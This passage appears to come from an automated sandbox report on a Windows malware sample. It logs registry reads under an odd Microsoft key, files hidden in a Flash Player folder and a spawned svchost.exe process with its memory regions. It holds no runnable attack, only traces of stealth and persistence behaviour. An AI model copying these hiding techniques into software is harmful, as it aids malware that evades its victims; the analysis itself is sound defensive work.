dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0215.001] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291fa48 | out: lpFileSize=0x291fa48*=0) returned 1 [0215.001] CloseHandle (hObject=0x10c) returned 1 [0215.001] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f0e8 | out: phkResult=0x291f0e8*=0x10c) returned 0x0 [0215.001] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f114, lpData=0x0, lpcbData=0x291f0fc*=0x0 | out: lpType=0x291f114*=0x3, lpData=0x0, lpcbData=0x291f0fc*=0x6f0) returned 0x0 [0215.001] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f114, lpData=0xed0590, lpcbData=0x291f0fc*=0x6f0 | out: lpType=0x291f114*=0x3, lpData=0xed0590*, lpcbData=0x291f0fc*=0x6f0) returned 0x0 [0215.001] RegCloseKey (hKey=0x10c) returned 0x0 [0215.001] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f3c4 | out: phkResult=0x291f3c4*=0x10c) returned 0x0 [0215.001] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291f3f0, lpData=0x0, lpcbData=0x291f3d8*=0x0 | out: lpType=0x291f3f0*=0x0, lpData=0x0, lpcbData=0x291f3d8*=0x0) returned 0x2 [0215.001] RegCloseKey (hKey=0x10c) returned 0x0 [0215.002] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0215.002] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291f3c8 | out: lpFileSize=0x291f3c8*=0) returned 1 [0215.002] CloseHandle (hObject=0x10c) returned 1 [0215.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f0c4 | out: phkResult=0x291f0c4*=0x10c) returned 0x0 [0215.002] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0x0, lpcbData=0x291f0d8*=0x0 | out: lpType=0x291f0f0*=0x3, lpData=0x0, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.002] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0xed0590, lpcbData=0x291f0d8*=0x6f0 | out: lpType=0x291f0f0*=0x3, lpData=0xed0590*, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.002] RegCloseKey (hKey=0x10c) returned 0x0 [0215.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291fa44 | out: phkResult=0x291fa44*=0x10c) returned 0x0 [0215.002] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291fa70, lpData=0x0, lpcbData=0x291fa58*=0x0 | out: lpType=0x291fa70*=0x0, lpData=0x0, lpcbData=0x291fa58*=0x0) returned 0x2 [0215.002] RegCloseKey (hKey=0x10c) returned 0x0 [0215.002] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0215.002] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291fa48 | out: lpFileSize=0x291fa48*=0) returned 1 [0215.002] CloseHandle (hObject=0x10c) returned 1 [0215.002] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f0c4 | out: phkResult=0x291f0c4*=0x10c) returned 0x0 [0215.002] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0x0, lpcbData=0x291f0d8*=0x0 | out: lpType=0x291f0f0*=0x3, lpData=0x0, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.002] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0xed0590, lpcbData=0x291f0d8*=0x6f0 | out: lpType=0x291f0f0*=0x3, lpData=0xed0590*, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.003] RegCloseKey (hKey=0x10c) returned 0x0 [0215.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291fa44 | out: phkResult=0x291fa44*=0x10c) returned 0x0 [0215.003] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291fa70, lpData=0x0, lpcbData=0x291fa58*=0x0 | out: lpType=0x291fa70*=0x0, lpData=0x0, lpcbData=0x291fa58*=0x0) returned 0x2 [0215.003] RegCloseKey (hKey=0x10c) returned 0x0 [0215.003] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0215.003] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291fa48 | out: lpFileSize=0x291fa48*=0) returned 1 [0215.003] CloseHandle (hObject=0x10c) returned 1 [0215.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f0c4 | out: phkResult=0x291f0c4*=0x10c) returned 0x0 [0215.003] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0x0, lpcbData=0x291f0d8*=0x0 | out: lpType=0x291f0f0*=0x3, lpData=0x0, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.003] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0xed0590, lpcbData=0x291f0d8*=0x6f0 | out: lpType=0x291f0f0*=0x3, lpData=0xed0590*, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.003] RegCloseKey (hKey=0x10c) returned 0x0 [0215.003] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291fa44 | out: phkResult=0x291fa44*=0x10c) returned 0x0 [0215.004] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291fa70, lpData=0x0, lpcbData=0x291fa58*=0x0 | out: lpType=0x291fa70*=0x0, lpData=0x0, lpcbData=0x291fa58*=0x0) returned 0x2 [0215.004] RegCloseKey (hKey=0x10c) returned 0x0 [0215.004] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0215.004] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291fa48 | out: lpFileSize=0x291fa48*=0) returned 1 [0215.004] CloseHandle (hObject=0x10c) returned 1 [0215.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291f0c4 | out: phkResult=0x291f0c4*=0x10c) returned 0x0 [0215.004] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0x0, lpcbData=0x291f0d8*=0x0 | out: lpType=0x291f0f0*=0x3, lpData=0x0, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.004] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291f0f0, lpData=0xed0590, lpcbData=0x291f0d8*=0x6f0 | out: lpType=0x291f0f0*=0x3, lpData=0xed0590*, lpcbData=0x291f0d8*=0x6f0) returned 0x0 [0215.004] RegCloseKey (hKey=0x10c) returned 0x0 [0215.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291fa44 | out: phkResult=0x291fa44*=0x10c) returned 0x0 [0215.004] RegQueryValueExW (in: hKey=0x10c, lpValueName="Omegovna", lpReserved=0x0, lpType=0x291fa70, lpData=0x0, lpcbData=0x291fa58*=0x0 | out: lpType=0x291fa70*=0x0, lpData=0x0, lpcbData=0x291fa58*=0x0) returned 0x2 [0215.004] RegCloseKey (hKey=0x10c) returned 0x0 [0215.004] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x10c [0215.004] GetFileSizeEx (in: hFile=0x10c, lpFileSize=0x291fa48 | out: lpFileSize=0x291fa48*=0) returned 1 [0215.004] CloseHandle (hObject=0x10c) returned 1 [0215.004] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x291ef30 | out: phkResult=0x291ef30*=0x10c) returned 0x0 [0215.004] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291ef5c, lpData=0x0, lpcbData=0x291ef44*=0x0 | out: lpType=0x291ef5c*=0x3, lpData=0x0, lpcbData=0x291ef44*=0x6f0) returned 0x0 [0215.005] RegQueryValueExW (in: hKey=0x10c, lpValueName="Baywkivyl", lpReserved=0x0, lpType=0x291ef5c, lpData=0xed0590, lpcbData=0x291ef44*=0x6f0 | out: lpType=0x291ef5c*=0x3, lpData=0xed0590*, lpcbData=0x291ef44*=0x6f0) returned 0x0 [0215.005] RegCloseKey (hKey=0x10c) returned 0x0 [0215.005] PathFileExistsW (pszPath="") returned 0 [0215.005] PathFileExistsW (pszPath="") returned 0 [0215.005] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x1b7740) Thread: id = 167 os_tid = 0x9c4 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="A8") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="F7") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="13") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="84") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="33") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="2E") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="EB") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="F6") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="34") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="7B") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="63") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="2E") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="BC") returned 2 [0215.005] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="52") returned 2 [0215.006] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="43") returned 2 [0215.006] wvnsprintfW (in: pszDest=0x27ef588, cchDest=3, pszFmt="%02X", arglist=0x27ef564 | out: pszDest="37") returned 2 [0215.006] CreateEventW (lpEventAttributes=0xc77e4, bManualReset=0, bInitialState=0, lpName="A8F71384332EEBF6347B632EBC524337") returned 0x10c [0215.006] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x27ef764 | out: phkResult=0x27ef764*=0x110) returned 0x0 [0215.006] RegQueryValueExW (in: hKey=0x110, lpValueName="Omegovna", lpReserved=0x0, lpType=0x27ef790, lpData=0x0, lpcbData=0x27ef778*=0x0 | out: lpType=0x27ef790*=0x0, lpData=0x0, lpcbData=0x27ef778*=0x0) returned 0x2 [0215.006] RegCloseKey (hKey=0x110) returned 0x0 [0215.006] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x110 [0215.006] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x27ef768 | out: lpFileSize=0x27ef768*=0) returned 1 [0215.006] CloseHandle (hObject=0x110) returned 1 [0215.006] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0x0) returned 0x102 [0215.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x27ef5dc, cbMultiByte=80, lpWideCharStr=0x27ef39c, cchWideChar=150 | out: lpWideCharStr="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin㥩播ሩ鏼ꜧ㙩䗍闬㞌캶뒦僾₽폗췰䀫㿫ংꋁⒶ⍋큊韭肴我ꀉ畛㏖뢫珽蝀铱軂㘰Ƴ쪏퇹嵢免㽳Ô鋍롿㼿痁뇽䏱䡌喩苃葐픝⑙ia.com˾") returned 80 [0215.006] PathCombineW (in: pszDest=0xc9b38, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming", pszFile="Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" [0215.006] PathRemoveFileSpecW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys") returned 1 [0215.006] PathRenameExtensionW (in: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin", pszExt=".tmp" | out: pszPath="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.tmp") returned 1 [0215.006] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.tmp" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.tmp")) returned 0xffffffff [0215.006] GetFileAttributesW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin")) returned 0x2020 [0215.006] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\SJpF7mOw3gFdA.hin" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\sjpf7mow3gfda.hin"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x110 [0215.007] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x27ef818 | out: lpFileSize=0x27ef818*=0) returned 1 [0215.007] CloseHandle (hObject=0x110) returned 1 [0215.007] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="SOFTWARE\\Microsoft\\Acuhci", ulOptions=0x0, samDesired=0x1, phkResult=0x27ef75c | out: phkResult=0x27ef75c*=0x110) returned 0x0 [0215.007] RegQueryValueExW (in: hKey=0x110, lpValueName="Omegovna", lpReserved=0x0, lpType=0x27ef788, lpData=0x0, lpcbData=0x27ef770*=0x0 | out: lpType=0x27ef788*=0x0, lpData=0x0, lpcbData=0x27ef770*=0x0) returned 0x2 [0215.007] RegCloseKey (hKey=0x110) returned 0x0 [0215.007] CreateFileW (lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Macromedia\\Flash Player\\macromedia.com\\support\\flashplayer\\sys\\rO4p00rRfog3ie0eV3.ecv" (normalized: "c:\\users\\aetadzjz\\appdata\\roaming\\macromedia\\flash player\\macromedia.com\\support\\flashplayer\\sys\\ro4p00rrfog3ie0ev3.ecv"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x110 [0215.007] GetFileSizeEx (in: hFile=0x110, lpFileSize=0x27ef760 | out: lpFileSize=0x27ef760*=0) returned 1 [0215.007] CloseHandle (hObject=0x110) returned 1 [0215.007] WaitForMultipleObjects (nCount=0x2, lpHandles=0x27ef804*=0x8, bWaitAll=0, dwMilliseconds=0x927c0) Thread: id = 168 os_tid = 0xc4 [0215.007] WaitForSingleObject (hHandle=0x8, dwMilliseconds=0xffffffff) Thread: id = 178 os_tid = 0x984 Thread: id = 179 os_tid = 0x978 Thread: id = 180 os_tid = 0x95c Thread: id = 181 os_tid = 0xa70 Thread: id = 182 os_tid = 0x138 Thread: id = 196 os_tid = 0x708 Thread: id = 197 os_tid = 0xafc Process: id = "13" image_name = "svchost.exe" filename = "c:\\windows\\syswow64\\svchost.exe" page_root = "0x61a2e000" os_pid = "0x5fc" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0x7a8" cmd_line = "C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" cur_dir = "C:\\Users\\aETAdzjz\\AppData\\Roaming\\" os_username = "YKYD69Q\\aETAdzjz" os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:00010636" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 2194 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 2195 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 2196 start_va = 0x40000 end_va = 0x40fff entry_point = 0x40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 2197 start_va = 0x50000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000050000" filename = "" Region: id = 2198 start_va = 0x60000 end_va = 0x60fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000060000" filename = "" Region: id = 2199 start_va = 0x70000 end_va = 0x8bfff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 2200 start_va = 0x1b0000 end_va = 0x1effff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 2201 start_va = 0x220000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000220000" filename = "" Region: id = 2202 start_va = 0xfe0000 end_va = 0xfe7fff entry_point = 0xfe0000 region_type = mapped_file name = "svchost.exe" filename = "\\Windows\\SysWOW64\\svchost.exe" (normalized: "c:\\windows\\syswow64\\svchost.exe") Region: id = 2203 start_va = 0x77090000 end_va = 0x77238fff entry_point = 0x77090000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 2204 start_va = 0x77270000 end_va = 0x773effff entry_point = 0x77270000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 2205 start_va = 0x7efb0000 end_va = 0x7efd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efb0000" filename = "" Region: id = 2206 start_va = 0x7efdb000 end_va = 0x7efddfff entry_point = 0x0 region_type = private name = "private_0x000000007efdb000" filename = "" Region: id = 2207 start_va = 0x7efde000 end_va = 0x7efdefff entry_point = 0x0 region_type = private name = "private_0x000000007efde000" filename = "" Region: id = 2208 start_va = 0x7efdf000 end_va = 0x7efdffff entry_point = 0x0 region_type = private name = "private_0x000000007efdf000" filename = "" Region: id = 2209 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 2210 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2211 start_va = 0x7fff0000 end_va = 0x7fffffeffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 2212 start_va = 0x170000 end_va = 0x1affff entry_point = 0x0 region_type = private name = "private_0x0000000000170000" filename = "" Region: id = 2213 start_va = 0x2f0000 end_va = 0x32ffff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 2214 start_va = 0x3d0000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 2215 start_va = 0x746f0000 end_va = 0x746f7fff entry_point = 0x746f0000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 2216 start_va = 0x74700000 end_va = 0x7475bfff entry_point = 0x74700000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 2217 start_va = 0x74760000 end_va = 0x7479efff entry_point = 0x74760000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 2218 start_va = 0x7efd8000 end_va = 0x7efdafff entry_point = 0x0 region_type = private name = "private_0x000000007efd8000" filename = "" Region: id = 2221 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 2222 start_va = 0x90000 end_va = 0xf6fff entry_point = 0x90000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2223 start_va = 0x4f0000 end_va = 0x5effff entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 2224 start_va = 0x720000 end_va = 0x72ffff entry_point = 0x0 region_type = private name = "private_0x0000000000720000" filename = "" Region: id = 2225 start_va = 0x74dc0000 end_va = 0x74dcbfff entry_point = 0x74dc0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 2226 start_va = 0x74dd0000 end_va = 0x74e2ffff entry_point = 0x74dd0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 2227 start_va = 0x74e90000 end_va = 0x74ea8fff entry_point = 0x74e90000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 2228 start_va = 0x75250000 end_va = 0x75295fff entry_point = 0x75250000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 2229 start_va = 0x752a0000 end_va = 0x7534bfff entry_point = 0x752a0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 2230 start_va = 0x759f0000 end_va = 0x75afffff entry_point = 0x759f0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 2231 start_va = 0x76d80000 end_va = 0x76e6ffff entry_point = 0x76d80000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 2232 start_va = 0x76e70000 end_va = 0x76f69fff entry_point = 0x0 region_type = private name = "private_0x0000000076e70000" filename = "" Region: id = 2233 start_va = 0x76f70000 end_va = 0x7708efff entry_point = 0x0 region_type = private name = "private_0x0000000076f70000" filename = "" Region: id = 2234 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 2235 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 2236 start_va = 0x75790000 end_va = 0x7588ffff entry_point = 0x75790000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 2237 start_va = 0x75130000 end_va = 0x751bffff entry_point = 0x75130000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: 